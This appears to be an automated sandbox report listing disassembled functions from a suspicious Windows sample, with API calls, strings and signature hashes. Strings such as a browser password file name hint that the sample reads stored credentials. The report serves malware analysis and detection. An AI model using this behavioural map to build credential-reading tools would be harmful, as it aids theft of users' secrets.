                    • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                    • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                    • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                    • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                    Function 00414E13 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                    • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                    • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                    • String ID: SHAutoComplete$shlwapi.dll
                    • API String ID: 3150196962-1506664499
                    • Opcode ID: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                    • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                    • Opcode Fuzzy Hash: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                    • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                    Function 0041D893 Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy$memcmp
                    • String ID:
                    • API String ID: 3384217055-0
                    • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                    • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                    • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                    • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                    Function 00412A2A Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$memcpy
                    • String ID:
                    • API String ID: 368790112-0
                    • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                    • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                    • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                    • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                    Function 00410D9B Relevance: 6.2, APIs: 4, Instructions: 169windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                      • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                      • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                      • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                      • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                    • GetMenu.USER32(?), ref: 00410F8D
                    • GetSubMenu.USER32(00000000), ref: 00410F9A
                    • GetSubMenu.USER32(00000000), ref: 00410F9D
                    • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: Menu$ItemMessageSend$CheckEnableRadio
                    • String ID:
                    • API String ID: 1889144086-0
                    • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                    • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                    • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                    • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                    Function 00417FD5 Relevance: 6.1, APIs: 4, Instructions: 138fileCOMMON
                    Download Yara Rule
                    APIs
                    • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                    • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                    • GetLastError.KERNEL32 ref: 0041810A
                    • CloseHandle.KERNEL32(00000000), ref: 00418120
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: File$CloseCreateErrorHandleLastMappingView
                    • String ID:
                    • API String ID: 1661045500-0
                    • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                    • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                    • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                    • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                    Function 0042EB92 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 133COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                    • memcpy.MSVCRT ref: 0042EC7A
                    Strings
                    • Cannot add a column to a view, xrefs: 0042EBE8
                    • virtual tables may not be altered, xrefs: 0042EBD2
                    • sqlite_altertab_%s, xrefs: 0042EC4C
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpymemset
                    • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                    • API String ID: 1297977491-2063813899
                    • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                    • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                    • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                    • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                    Function 004055C5 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 122COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 0040560C
                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                      • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                      • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                      • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                      • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                      • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                      • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                    • String ID: *.*$dat$wand.dat
                    • API String ID: 2618321458-1828844352
                    • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                    • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                    • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                    • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                    Function 00410C46 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                      • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                    • wcslen.MSVCRT ref: 00410C74
                    • _wtoi.MSVCRT ref: 00410C80
                    • _wcsicmp.MSVCRT ref: 00410CCE
                    • _wcsicmp.MSVCRT ref: 00410CDF
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                    • String ID:
                    • API String ID: 1549203181-0
                    • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                    • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                    • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                    • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                    Function 00412018 Relevance: 6.1, APIs: 4, Instructions: 99windowkeyboardCOMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 00412057
                      • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                    • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                    • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                    • GetKeyState.USER32(00000010), ref: 0041210D
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ExecuteMenuMessageSendShellStateStringmemset
                    • String ID:
                    • API String ID: 3550944819-0
                    • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                    • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                    • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                    • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                    Function 0040A8D0 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                    Download Yara Rule
                    APIs
                    • wcslen.MSVCRT ref: 0040A8E2
                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                      • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                      • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                    • ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                    • ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                    • memcpy.MSVCRT ref: 0040A94F
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@$memcpy$mallocwcslen
                    • String ID:
                    • API String ID: 3023356884-0
                    • Opcode ID: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                    • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                    • Opcode Fuzzy Hash: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                    • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                    Function 0040B1D1 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                    Download Yara Rule
                    APIs
                    • wcslen.MSVCRT ref: 0040B1DE
                    • ??3@YAXPAX@Z.MSVCRT ref: 0040B201
                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                      • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                      • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                    • ??3@YAXPAX@Z.MSVCRT ref: 0040B224
                    • memcpy.MSVCRT ref: 0040B248
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@$memcpy$mallocwcslen
                    • String ID:
                    • API String ID: 3023356884-0
                    • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                    • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                    • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                    • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                    Function 0041298C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy
                    • String ID: @
                    • API String ID: 3510742995-2766056989
                    • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                    • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                    • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                    • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                    Function 0040AED2 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??2@??3@memcpymemset
                    • String ID:
                    • API String ID: 1865533344-0
                    • Opcode ID: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                    • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                    • Opcode Fuzzy Hash: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                    • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                    Function 0040B0D1 Relevance: 6.1, APIs: 4, Instructions: 55stringCOMMON
                    Download Yara Rule
                    APIs
                    • strlen.MSVCRT ref: 0040B0D8
                    • ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                      • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                      • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                    • ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                    • memcpy.MSVCRT ref: 0040B159
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@$memcpy$mallocstrlen
                    • String ID:
                    • API String ID: 1171893557-0
                    • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                    • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                    • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                    • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                    Function 004144BB Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 004144E7
                      • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                      • Part of subcall function 0040A353: memcpy.MSVCRT ref: 0040A3A8
                    • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                    • memset.MSVCRT ref: 0041451A
                    • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                    • String ID:
                    • API String ID: 1127616056-0
                    • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                    • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                    • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                    • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                    Function 0042FE8B Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy$memset
                    • String ID: sqlite_master
                    • API String ID: 438689982-3163232059
                    • Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                    • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                    • Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                    • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                    Function 00414D8A Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                    Download Yara Rule
                    APIs
                    • SHGetMalloc.SHELL32(?), ref: 00414D9A
                    • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                    • wcscpy.MSVCRT ref: 00414DF3
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: BrowseFolderFromListMallocPathwcscpy
                    • String ID:
                    • API String ID: 3917621476-0
                    • Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                    • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                    • Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                    • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                    Function 00410FB4 Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                      • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                    • _snwprintf.MSVCRT ref: 00410FE1
                    • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                    • _snwprintf.MSVCRT ref: 0041100C
                    • wcscat.MSVCRT ref: 0041101F
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                    • String ID:
                    • API String ID: 822687973-0
                    • Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                    • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                    • Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                    • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                    Function 00417434 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                    Download Yara Rule
                    APIs
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7622DF80,?,0041755F,?), ref: 00417452
                    • malloc.MSVCRT ref: 00417459
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7622DF80,?,0041755F,?), ref: 00417478
                    • ??3@YAXPAX@Z.MSVCRT ref: 0041747F
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide$??3@malloc
                    • String ID:
                    • API String ID: 4284152360-0
                    • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                    • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                    • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                    • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                    Function 004123E2 Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON
                    Download Yara Rule
                    APIs
                    • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                    • RegisterClassW.USER32(?), ref: 00412428
                    • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                    • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: HandleModule$ClassCreateRegisterWindow
                    • String ID:
                    • API String ID: 2678498856-0
                    • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                    • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                    • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                    • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                    Function 00409B32 Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetDlgItem.USER32(?,?), ref: 00409B40
                    • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                    • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                    • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: MessageSend$Item
                    • String ID:
                    • API String ID: 3888421826-0
                    • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                    • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                    • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                    • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                    Function 00417B5E Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 00417B7B
                    • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                    • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                    • GetLastError.KERNEL32 ref: 00417BB5
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: File$ErrorLastLockUnlockmemset
                    • String ID:
                    • API String ID: 3727323765-0
                    • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                    • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                    • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                    • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                    Function 004173E4 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                    Download Yara Rule
                    APIs
                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                    • malloc.MSVCRT ref: 00417407
